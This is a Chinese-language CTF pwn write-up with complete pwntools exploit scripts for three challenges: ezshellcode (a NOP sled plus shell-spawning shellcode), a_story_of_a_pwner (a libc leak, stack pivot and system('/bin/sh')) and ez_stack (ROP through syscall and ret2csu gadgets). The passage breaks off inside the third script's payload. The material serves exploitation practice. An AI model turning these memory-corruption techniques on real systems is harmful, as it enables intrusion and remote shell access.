提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
ezshellcode
填充nop抵消随机滑行到shellcode
#!usr/bin/env python
#coding=utf-8
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
DEBUG = 1
if DEBUG:
gdbOpen = 1
clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
p = process('./pwn')
else:
gdbOpen = 0
ip = 'node.yuzhian.com.cn'
port = 38867
p = remote(ip, port)
clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
def debug(info="b main"):
if gdbOpen == 1:
gdb.attach(p, info)
#gdb.attach(p, "b *$rebase(0x)")
debug("b *0x00000000004012F1")
shellcode = p8(0x90) * 104 + asm(shellcraft.sh())
p.sendafter("in 5 min!\n", shellcode)
p.interactive()
a_story_of_a_pwner
栈迁移然后刚好够弹一个参数执行system
#!usr/bin/env python
#coding=utf-8
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
DEBUG = 0
if DEBUG:
gdbOpen = 1
clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF("./libc.so.6")
p = process('./pwn')
else:
gdbOpen = 0
ip = 'node2.yuzhian.com.cn'
port = 33627
libc = ELF("./libc.so.6")
p = remote(ip, port)
clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
def debug(info="b main"):
if gdbOpen == 1:
gdb.attach(p, info)
#gdb.attach(p, "b *$rebase(0x)")
def choose(choice):
p.sendlineafter(b"> \n", str(choice).encode('ascii'))
pop_rdi = 0x0000000000401573
leave_ret = 0x000000000040139E
debug("b *0x000000000040139F")
choose(4)
p.recvuntil(b'0x')
leak = int(p.recv(12), 16) - 0x84420
log.info("libc_base==>0x%x" %leak)
sys = leak + libc.sym['system']
binsh = leak + next(libc.search(b'/bin/sh'))
choose(1)
p.sendafter(b'comment?\n', p64(binsh))
choose(2)
p.sendafter(b'corment?\n', p64(pop_rdi))
choose(3)
p.sendafter(b'corMenT?\n', p64(sys))
choose(4)
payload = b'a'*0xa + p64(0x0000000000405098) + p64(leave_ret)
p.sendafter(b'heart...\n', payload)
p.interactive()
ez_stack
程序内直接就能找到syscall的gadget,使用其即可,注意的地方就是csu调用的时候是个指针,所以要把这个地址写入bss上才能正常使用
#!usr/bin/env python
#coding=utf-8
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./ez_stack')
DEBUG = 0
if DEBUG:
gdbOpen = 1
libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so")
p = process(argv=[ld.path,elf.path], env={"LD_PRELOAD" : libc.path})
clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
#p = process('./ez_stack')
else:
gdbOpen = 0
ip = 'node2.yuzhian.com.cn'
port = 35211
p = remote(ip, port)
clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
def debug(info="b main"):
if gdbOpen == 1:
gdb.attach(p, info)
#gdb.attach(p, "b *$rebase(0x)")
pop_rdi = 0x0000000000401283
pop_rsi = 0x0000000000401281 # pop rsi ; pop r15 ; ret
syscall = 0x000000000040114e
csu1 = 0x000000000040127A
csu2 = 0x0000000000401260
debug("b *0x00000000004011F6")
payload = b'a'*0x18 &#